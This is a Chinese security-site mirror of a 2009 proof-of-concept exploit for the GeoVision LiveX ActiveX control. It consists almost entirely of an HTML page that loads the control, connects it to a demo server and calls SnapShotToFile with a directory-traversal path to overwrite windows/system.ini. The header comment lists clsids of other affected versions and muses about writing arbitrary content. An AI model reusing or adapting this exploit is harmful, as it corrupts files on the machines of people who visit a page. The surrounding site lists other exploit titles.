首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GeoVision LiveX_v8200 ActiveX (LIVEX_~1.OCX) File Corruption PoC
来源:http://retrogod.altervista.org/ 作者:SnoopyAssault 发布时间:2009-02-17  
<!--
GeoVision LiveX_v8200 ActiveX Control (LIVEX_~1.OCX) remote file corruption poc
by Nine:Situations:Group::SnoopyAssault
site: http://retrogod.altervista.org/

working against IE8b/xpsp3, safe for scripting and for initialize.
LiveX_v7000 with clsid {DA8484DE-52DB-4860-A986-61A8682E298A}
LiveX_v8120 with clsid {F4421170-DB22-4551-BBFB-FFCFFB419F6F}
have the same SnapShotToFile() and SnapShotX() methods

this poc connects to a live demo server and replaces system.ini with jpeg content...
could we set arbitrary content (???) ... maybe trough a fake server, checking ...
-->
<html>
<head>
<script language="JavaScript">
function sleep(n)
{
    var now = new Date();
    var exitTime = now.getTime() + (n*1000);
    while (true) {
        now = new Date();
            if (now.getTime() > exitTime) return;
    }
}
</script>
</head>
<body>
<object classid="clsid:8D58D690-6B71-4ee8-85AD-006DB0287BF1" id="WebCamX1" width="360" height="300">
            <param name="IpAddress" value="http://24.248.47.203" ref> <!-- demo server -->
            <param name="DisablePWD" value="-1">
            <param name="UserName" value="wec">
            <param name="Password" value="">
          <param name="CommandPort" value="4550">
<param name="DataPort" value="5550">
<param name="AudioDataPort" value="6550">
<param name="BandWidth" value="LAN">
<param name="FixSize" value="0">
<param name="FixWidth" value="320">
<param name="FixHeight" value="240">
<param name="SvrType" value="0">
<param name="AutoLogin" value="0">
<param name="DefaultCam" value="1">
<param name="AutoReConnect" value="-1">
<param name="MaxRetries" value="-1">
<param name="RetryInterval" value="70">
          </object>
<script language="JavaScript">
  sleep(2);
  //WebCamX1.SetCntDeviceType(0);
  //WebCamX1.EnableAutoScreenSize(1);
  //WebCamX1.SetInfo(125,1,0,"","");
  //WebCamX1.SetInfo(129,1,0,"","");
  //WebCamX1.SetUpdateInfo(100, "WebCam", 0, "", 8200, 0,0);
  //WebCamX1.DefaultCam = 1;
  WebCamX1.PlayX();
  sleep(2);
  WebCamX1.SnapShotToFile("../../../../../../../../../../../windows/system.ini");
  WebCamX1.SnapShotX();
</script>   
</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TPTEST <= 3.1.7 Stack Buffer O
·Falt4 CMS RC4 (fckeditor) Arbi
·MemHT Portal <= 4.0.1 (pvtmsg)
·Oracle 10g MDSYS.SDO_TOPO_DROP
·FreeBSD 7.0-RELEASE suffers fr
·Firepack (admin/ref.php) Remot
·Alice Gate2 plus Wi-Fi arbitra
·MS Internet Explorer 7 Memory
·Falt4 Extreme RC4,10.9.2007 CM
·Internet Explorer 7.0 Exploit(
·simplePMS CMS version 0.1.3A r
·MS09-002利用代码
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved